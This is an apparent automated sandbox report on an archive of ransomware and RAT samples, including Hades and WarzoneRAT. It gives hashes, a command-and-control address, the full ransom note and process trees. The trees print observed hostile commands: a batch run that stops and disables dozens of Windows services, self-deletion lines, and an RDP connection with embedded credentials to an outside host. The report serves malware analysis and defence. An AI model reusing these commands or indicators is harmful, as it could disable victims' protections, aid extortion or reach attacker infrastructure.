Overview

overview

10

Static

static

1

RNSM00414.7z

windows10-2004-x64

10

Analysis

  • max time kernel
    200s
  • max time network
    202s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-10-2024 16:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RNSM00414.7z

  • Size

    6.8MB

  • MD5

    4ba05bc378b38b52acaadfe09cf3122e

  • SHA1

    3693e47da4d01d389ea59bb4451494710fa5b17b

  • SHA256

    7d3f9f20a5bcdb6e2e9d53685af5b7f46d3604d5d9a9539cf8b35c8c41addd45

  • SHA512

    bef4cec704fe2a89be5594083902549e9fbf6a6d2123f26f19a4a9cb41ababea6adeb13e3c157710dbbe7d4dee1fac27b94fcfeb3e5e488af3cf62a9f4a87f03

  • SSDEEP

    98304:sGntqpfpepXXmmNMQPHZk9FnTW+1O1kOeJEP41yCtaJkLBjhnEvh7k9h5KDZXXiS:sCtSepnZBk9FTW+Up4ttHKWK0KqC5

Score
10/10
hadeswarzoneratcryptonediscoveryevasionexecutioninfostealerpackerpersistenceprivilege_escalationransomwarerattrojan

Malware Config

Extracted

Family

warzonerat

C2

194.68.59.48:2318

Extracted

Path

C:\Users\Admin\Desktop\HOW-TO-DECRYPT-gn9cj.txt

Ransom Note
[+] What happened? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has extension *.gn9cj By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant get back your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] Using a TOR browser! - Download and install TOR browser from this site: hxxps://torproject.org/ - Open our website: hxxp://khfsk3ffg3av3rha.onion - Follow the on-screen instructions Extension name: *.gn9cj ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) will make everything possible for restoring, but please do not interfere. !!! !!! !!! ��

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Hades Ransomware

    Ransomware family attributed to Evil Corp APT first seen in late 2020.

    ransomwarehades
  • Hades family
    hades
  • Hades payload 6 IoCs
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

    ratinfostealerwarzonerat
  • Warzonerat family
    warzonerat
  • CryptOne packer 1 IoCs

    Detects CryptOne packer defined in NCC blogpost.

    cryptonepacker
  • Renames multiple (171) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Warzone RAT payload 4 IoCs
    rat
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 14 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 64 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 39 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Time Discovery 1 TTPs 1 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
    evasion
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00414.7z"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2936
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4840
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /1
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:4176
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:220
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2936
      • C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.MSIL.Encoder.vho-30b877a266dc809a469155ab42de7ad0e225e15777870b03a049ddb1123217d4.exe
        HEUR-Trojan-Ransom.MSIL.Encoder.vho-30b877a266dc809a469155ab42de7ad0e225e15777870b03a049ddb1123217d4.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2304
      • C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.Win32.Blocker.gen-248eabc9c97d8c4994c26c88cf1806ea9274eb187e3eb0bae7ae8035c7f3b189.exe
        HEUR-Trojan-Ransom.Win32.Blocker.gen-248eabc9c97d8c4994c26c88cf1806ea9274eb187e3eb0bae7ae8035c7f3b189.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:748
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 748 -s 1320
          4⤵
          • Program crash
          PID:3792
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 748 -s 1912
          4⤵
          • Program crash
          PID:4644
      • C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe
        HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        PID:2668
      • C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.Win32.Generic-5e58a1576d022944a3f18102fe5ff04a8b4d56918003b53b914beece11e63868.exe
        HEUR-Trojan-Ransom.Win32.Generic-5e58a1576d022944a3f18102fe5ff04a8b4d56918003b53b914beece11e63868.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2636
      • C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.exe
        Trojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2648
        • C:\Users\Admin\RDP6\ConnectionClient.exe
          "C:\Users\Admin\RDP6\ConnectionClient.exe" -server fmea.homepc.it -user rileva1 -psw newfmea -color 32 -alttab 0 -remoteapp off -seamless off -width 1024 -height 768 -printer off -com off -smartcard off -preview on -disk on -smartsizing 0 -localtb 32
          4⤵
          • UAC bypass
          • Checks computer location settings
          • Executes dropped EXE
          • Checks whether UAC is enabled
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:3736
          • C:\Users\Admin\RDP6\TsCredentials.exe
            "C:\Users\Admin\RDP6\TsCredentials.exe" fmea.homepc.it /Delete
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:4676
          • C:\Users\Admin\RDP6\TsCredentials.exe
            "C:\Users\Admin\RDP6\TsCredentials.exe" fmea.homepc.it rileva1 newfmea
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2528
          • C:\Windows\SysWOW64\mstsc.exe
            "C:\Windows\SysWOW64\mstsc.exe" "C:\Users\Admin\RDP6\Session.rdp"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3280
            • C:\Windows\system32\mstsc.exe
              "C:\Windows\SysWOW64\mstsc.exe" "C:\Users\Admin\RDP6\Session.rdp"
              6⤵
              • Enumerates connected drives
              • Checks SCSI registry key(s)
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious use of SetWindowsHookEx
              PID:4704
          • C:\Users\Admin\RDP6\TsCredentials.exe
            "C:\Users\Admin\RDP6\TsCredentials.exe" fmea.homepc.it /Delete
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2760
      • C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Cryrar.hev-3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f.exe
        Trojan-Ransom.Win32.Cryrar.hev-3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3756
        • C:\Windows\system32\cmd.exe
          "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6491.tmp\64A2.bat C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Cryrar.hev-3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3880
          • C:\Windows\system32\ipconfig.exe
            ipconfig /release
            5⤵
            • Gathers network information
            PID:4568
          • C:\Windows\system32\ipconfig.exe
            ipconfig /renew
            5⤵
            • Gathers network information
            PID:4548
          • C:\Windows\system32\ipconfig.exe
            ipconfig /flushdns
            5⤵
            • Gathers network information
            PID:5020
          • C:\Windows\system32\netsh.exe
            netsh int tcp show global
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:1612
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global chimney=enabled
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:2892
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global autotuninglevel=normal
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:4508
          • C:\Windows\system32\netsh.exe
            netsh interface tcp set heuristics disabled
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:1104
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global dca=enabled
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:832
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global netdma=enabled
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:4436
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global rss=enabled
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:4948
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global rsc=enabled
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:4912
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global ecncapability=disabled
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:2236
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global initialRto=2000
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:2028
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global timestamps=disabled
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Time Discovery
            PID:1940
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global nonsackrttresiliency=disabled
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:3112
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global maxsynretransmissions=2
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:3572
          • C:\Windows\system32\sc.exe
            SC CONFIG "ALG" start= disabled
            5⤵
              PID:4092
            • C:\Windows\system32\sc.exe
              sc stop "ALG"
              5⤵
              • Launches sc.exe
              PID:4956
            • C:\Windows\system32\sc.exe
              sc config "bthserv" start= disabled
              5⤵
              • Launches sc.exe
              PID:1596
            • C:\Windows\system32\sc.exe
              sc stop "bthserv"
              5⤵
              • Launches sc.exe
              PID:4800
            • C:\Windows\system32\sc.exe
              sc config "BthHFSrv" start= disabled
              5⤵
              • Launches sc.exe
              PID:3984
            • C:\Windows\system32\sc.exe
              sc stop "BthHFSrv"
              5⤵
              • Launches sc.exe
              PID:3860
            • C:\Windows\system32\sc.exe
              sc config "PeerDistSvc" start= disabled
              5⤵
              • Launches sc.exe
              PID:3172
            • C:\Windows\system32\sc.exe
              sc stop "PeerDistSvc"
              5⤵
              • Launches sc.exe
              PID:3404
            • C:\Windows\system32\sc.exe
              sc config "CertPropSvc" start= disabled
              5⤵
              • Launches sc.exe
              PID:1316
            • C:\Windows\system32\sc.exe
              sc stop "CertPropSvc"
              5⤵
              • Launches sc.exe
              PID:3520
            • C:\Windows\system32\sc.exe
              sc config "VaultSvc" start= disabled
              5⤵
              • Launches sc.exe
              PID:624
            • C:\Windows\system32\sc.exe
              sc stop "VaultSvc"
              5⤵
              • Launches sc.exe
              PID:468
            • C:\Windows\system32\sc.exe
              sc config "CryptSvc" start= disabled
              5⤵
              • Launches sc.exe
              PID:4364
            • C:\Windows\system32\sc.exe
              sc stop "CryptSvc"
              5⤵
              • Launches sc.exe
              PID:952
            • C:\Windows\system32\sc.exe
              sc config "TrkWks" start= disabled
              5⤵
              • Launches sc.exe
              PID:1224
            • C:\Windows\system32\sc.exe
              sc stop "TrkWks"
              5⤵
              • Launches sc.exe
              PID:2256
            • C:\Windows\system32\sc.exe
              sc config "DiagTrack" start= disabled
              5⤵
              • Launches sc.exe
              PID:4972
            • C:\Windows\system32\sc.exe
              sc stop "DiagTrack"
              5⤵
              • Launches sc.exe
              PID:1124
            • C:\Windows\system32\sc.exe
              sc config "WPCSvc" start= disabled
              5⤵
              • Launches sc.exe
              PID:1600
            • C:\Windows\system32\sc.exe
              sc stop "WPCSvc"
              5⤵
              • Launches sc.exe
              PID:388
            • C:\Windows\system32\sc.exe
              sc config "HomeGroupListener" start= disabled
              5⤵
              • Launches sc.exe
              PID:3288
            • C:\Windows\system32\sc.exe
              sc stop "HomeGroupListener"
              5⤵
              • Launches sc.exe
              PID:1104
            • C:\Windows\system32\sc.exe
              sc config "HomeGroupProvider" start= disabled
              5⤵
              • Launches sc.exe
              PID:3016
            • C:\Windows\system32\sc.exe
              sc stop "HomeGroupProvider"
              5⤵
              • Launches sc.exe
              PID:832
            • C:\Windows\system32\sc.exe
              sc config "hidserv" start= disabled
              5⤵
              • Launches sc.exe
              PID:2404
            • C:\Windows\system32\sc.exe
              sc stop "hidserv"
              5⤵
              • Launches sc.exe
              PID:4924
            • C:\Windows\system32\sc.exe
              sc config "vmicvss" start= disabled
              5⤵
              • Launches sc.exe
              PID:1892
            • C:\Windows\system32\sc.exe
              sc stop "vmicvss"
              5⤵
              • Launches sc.exe
              PID:2284
            • C:\Windows\system32\sc.exe
              sc config "vmictimesync" start= disabled
              5⤵
              • Launches sc.exe
              PID:664
            • C:\Windows\system32\sc.exe
              sc stop "vmictimesync"
              5⤵
              • Launches sc.exe
              PID:4500
            • C:\Windows\system32\sc.exe
              sc config "vmicrdv" start= disabled
              5⤵
              • Launches sc.exe
              PID:4236
            • C:\Windows\system32\sc.exe
              sc stop "vmicrdv"
              5⤵
              • Launches sc.exe
              PID:4644
            • C:\Windows\system32\sc.exe
              sc config "vmicheartbeat" start= disabled
              5⤵
              • Launches sc.exe
              PID:1664
            • C:\Windows\system32\sc.exe
              sc stop "vmicheartbeat"
              5⤵
              • Launches sc.exe
              PID:2916
            • C:\Windows\system32\sc.exe
              sc config "vmicshutdown" start= disabled
              5⤵
              • Launches sc.exe
              PID:692
            • C:\Windows\system32\sc.exe
              sc stop "vmicshutdown"
              5⤵
              • Launches sc.exe
              PID:4076
            • C:\Windows\system32\sc.exe
              sc config "vmicguestinterface" start= disabled
              5⤵
              • Launches sc.exe
              PID:3512
            • C:\Windows\system32\sc.exe
              sc stop "vmicguestinterface"
              5⤵
              • Launches sc.exe
              PID:1876
            • C:\Windows\system32\sc.exe
              sc config "vmickvpexchange" start= disabled
              5⤵
              • Launches sc.exe
              PID:1568
            • C:\Windows\system32\sc.exe
              sc stop "vmickvpexchange"
              5⤵
              • Launches sc.exe
              PID:2352
            • C:\Windows\system32\sc.exe
              sc config "SharedAccess" start= disabled
              5⤵
              • Launches sc.exe
              PID:2964
            • C:\Windows\system32\sc.exe
              sc stop "SharedAccess"
              5⤵
              • Launches sc.exe
              PID:4516
            • C:\Windows\system32\sc.exe
              sc config "IEEtwCollectorService" start= disabled
              5⤵
              • Launches sc.exe
              PID:1916
            • C:\Windows\system32\sc.exe
              sc stop "IEEtwCollectorService"
              5⤵
              • Launches sc.exe
              PID:1608
            • C:\Windows\system32\sc.exe
              sc config "iphlpsvc" start= disabled
              5⤵
              • Launches sc.exe
              PID:1428
            • C:\Windows\system32\sc.exe
              sc stop "iphlpsvc"
              5⤵
              • Launches sc.exe
              PID:1316
            • C:\Windows\system32\sc.exe
              sc config "MSiSCSI" start= disabled
              5⤵
              • Launches sc.exe
              PID:3520
            • C:\Windows\system32\sc.exe
              sc stop "MSiSCSI"
              5⤵
              • Launches sc.exe
              PID:4020
            • C:\Windows\system32\sc.exe
              sc config "NetTcpPortSharing" start= disabled
              5⤵
              • Launches sc.exe
              PID:3392
            • C:\Windows\system32\sc.exe
              sc stop "NetTcpPortSharing"
              5⤵
                PID:1224
              • C:\Windows\system32\sc.exe
                sc config "Netlogon" start= disabled
                5⤵
                • Launches sc.exe
                PID:3288
              • C:\Windows\system32\sc.exe
                sc stop "Netlogon"
                5⤵
                • Launches sc.exe
                PID:3016
              • C:\Windows\system32\sc.exe
                sc config "napagent" start= disabled
                5⤵
                • Launches sc.exe
                PID:2796
              • C:\Windows\system32\sc.exe
                sc stop "napagent"
                5⤵
                • Launches sc.exe
                PID:4720
              • C:\Windows\system32\sc.exe
                sc config "CscService" start= disabled
                5⤵
                • Launches sc.exe
                PID:4948
              • C:\Windows\system32\sc.exe
                sc stop "CscService"
                5⤵
                • Launches sc.exe
                PID:2804
              • C:\Windows\system32\sc.exe
                sc config "PNRPsvc" start= disabled
                5⤵
                • Launches sc.exe
                PID:2676
              • C:\Windows\system32\sc.exe
                sc stop "PNRPsvc"
                5⤵
                • Launches sc.exe
                PID:464
              • C:\Windows\system32\sc.exe
                sc config "p2pimsvc" start= disabled
                5⤵
                • Launches sc.exe
                PID:4208
              • C:\Windows\system32\sc.exe
                sc stop "p2pimsvc"
                5⤵
                • Launches sc.exe
                PID:2180
              • C:\Windows\system32\sc.exe
                sc config "RemoteAccess" start= disabled
                5⤵
                • Launches sc.exe
                PID:2528
              • C:\Windows\system32\sc.exe
                sc stop "RemoteAccess"
                5⤵
                • Launches sc.exe
                PID:3572
              • C:\Windows\system32\sc.exe
                sc config "wuauserv" start= disabled
                5⤵
                • Launches sc.exe
                PID:2352
              • C:\Windows\system32\sc.exe
                sc stop "wuauserv"
                5⤵
                • Launches sc.exe
                PID:2964
              • C:\Windows\system32\sc.exe
                sc config "wcncsvc" start= disabled
                5⤵
                • Launches sc.exe
                PID:2648
              • C:\Windows\system32\sc.exe
                sc stop "wcncsvc"
                5⤵
                • Launches sc.exe
                PID:428
          • C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Foreign.ofow-2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae.exe
            Trojan-Ransom.Win32.Foreign.ofow-2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae.exe
            3⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4404
            • C:\ProgramData\images.exe
              "C:\ProgramData\images.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1376
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:3716
          • C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Hades.a-ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d.exe
            Trojan-Ransom.Win32.Hades.a-ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d.exe
            3⤵
            • Executes dropped EXE
            PID:2004
            • C:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement
              C:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement /go
              4⤵
              • Executes dropped EXE
              PID:852
              • C:\Windows\SYSTEM32\cmd.exe
                cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement" & del "C:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement" & rd "C:\Users\Admin\AppData\Roaming\AccessRendezvous\"
                5⤵
                  PID:2444
                  • C:\Windows\system32\waitfor.exe
                    waitfor /t 10 pause /d y
                    6⤵
                      PID:4828
                    • C:\Windows\system32\attrib.exe
                      attrib -h "C:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement"
                      6⤵
                      • Views/modifies file attributes
                      PID:3756
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Hades.a-ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d.exe" & del "C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Hades.a-ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d.exe" & rd "C:\Users\Admin\Desktop\00414\"
                  4⤵
                    PID:2008
                    • C:\Windows\system32\waitfor.exe
                      waitfor /t 10 pause /d y
                      5⤵
                        PID:3700
                      • C:\Windows\system32\attrib.exe
                        attrib -h "C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Hades.a-ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d.exe"
                        5⤵
                        • Views/modifies file attributes
                        PID:2216
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                1⤵
                  PID:2392
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 748 -ip 748
                  1⤵
                    PID:388
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 748 -ip 748
                    1⤵
                      PID:4500
                    • C:\Windows\System32\rundll32.exe
                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                      1⤵
                        PID:4112
                      • C:\Windows\system32\NOTEPAD.EXE
                        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Documents\HOW-TO-DECRYPT-gn9cj.txt
                        1⤵
                          PID:3820

                        Network

                        MITRE ATT&CK Enterprise v15

                        Reconnaissance

                        Resource Development

                        Initial Access

                        Execution

                        Command and Scripting Interpreter

                        1
                        T1059

                        System Services

                        2
                        T1569

                        Service Execution

                        2
                        T1569.002

                        Persistence

                        Boot or Logon Autostart Execution

                        1
                        T1547

                        Registry Run Keys / Startup Folder

                        1
                        T1547.001

                        Create or Modify System Process

                        2
                        T1543

                        Windows Service

                        2
                        T1543.003

                        Event Triggered Execution

                        1
                        T1546

                        Netsh Helper DLL

                        1
                        T1546.007

                        Privilege Escalation

                        Abuse Elevation Control Mechanism

                        1
                        T1548

                        Bypass User Account Control

                        1
                        T1548.002

                        Boot or Logon Autostart Execution

                        1
                        T1547

                        Registry Run Keys / Startup Folder

                        1
                        T1547.001

                        Create or Modify System Process

                        2
                        T1543

                        Windows Service

                        2
                        T1543.003

                        Event Triggered Execution

                        1
                        T1546

                        Netsh Helper DLL

                        1
                        T1546.007

                        Defense Evasion

                        Abuse Elevation Control Mechanism

                        1
                        T1548

                        Bypass User Account Control

                        1
                        T1548.002

                        Hide Artifacts

                        1
                        T1564

                        Hidden Files and Directories

                        1
                        T1564.001

                        Impair Defenses

                        2
                        T1562

                        Disable or Modify Tools

                        1
                        T1562.001

                        Modify Registry

                        3
                        T1112

                        Credential Access

                        Discovery

                        Peripheral Device Discovery

                        2
                        T1120

                        Query Registry

                        3
                        T1012

                        System Information Discovery

                        6
                        T1082

                        System Location Discovery

                        1
                        T1614

                        System Language Discovery

                        1
                        T1614.001

                        System Time Discovery

                        1
                        T1124

                        Lateral Movement

                        Collection

                        Command and Control

                        Web Service

                        1
                        T1102

                        Exfiltration

                        Impact

                        Service Stop

                        2
                        T1489

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
                          Filesize

                          174B

                          MD5

                          119ca34bd8a50ef617f474f56bec89d2

                          SHA1

                          f04e05e6877439b38f7196ce180b1b83471134d6

                          SHA256

                          c7340b72b2b49f6d216b5793f89dcf146a001fe16947ea9b44c51319d7db508a

                          SHA512

                          77ed344d9490b76e3c9d7266d35f0d403c4ab0b3a273a082da665cf053b57bdf935b49cecc498a381409ce16c48476fa80c3836ba60267e69331f34f8208014b

                          Download Submit

                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
                          Filesize

                          170B

                          MD5

                          cbad59f2a877a24a3e3436391e6e7dbd

                          SHA1

                          7c3a4713faf280a0b9316db3ff141edf0d5ca53a

                          SHA256

                          ebddb02cf43dfd1f1f05d0052048ac3dfdf160b0ba71d55ddda576a0ddffa4c2

                          SHA512

                          b3a98411db61eacd61c09a9a71384c399b8d273264748d956a99ec7eac1b9cece112a107d5930db5762a852a44bd9fada07be2d8e17cd58102f4cce098a0c137

                          Download Submit

                        • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
                          Filesize

                          64KB

                          MD5

                          d2fb266b97caff2086bf0fa74eddb6b2

                          SHA1

                          2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

                          SHA256

                          b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

                          SHA512

                          c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

                          Download Submit

                        • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
                          Filesize

                          4B

                          MD5

                          f49655f856acb8884cc0ace29216f511

                          SHA1

                          cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                          SHA256

                          7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                          SHA512

                          599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                          Download Submit

                        • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
                          Filesize

                          944B

                          MD5

                          6bd369f7c74a28194c991ed1404da30f

                          SHA1

                          0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

                          SHA256

                          878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

                          SHA512

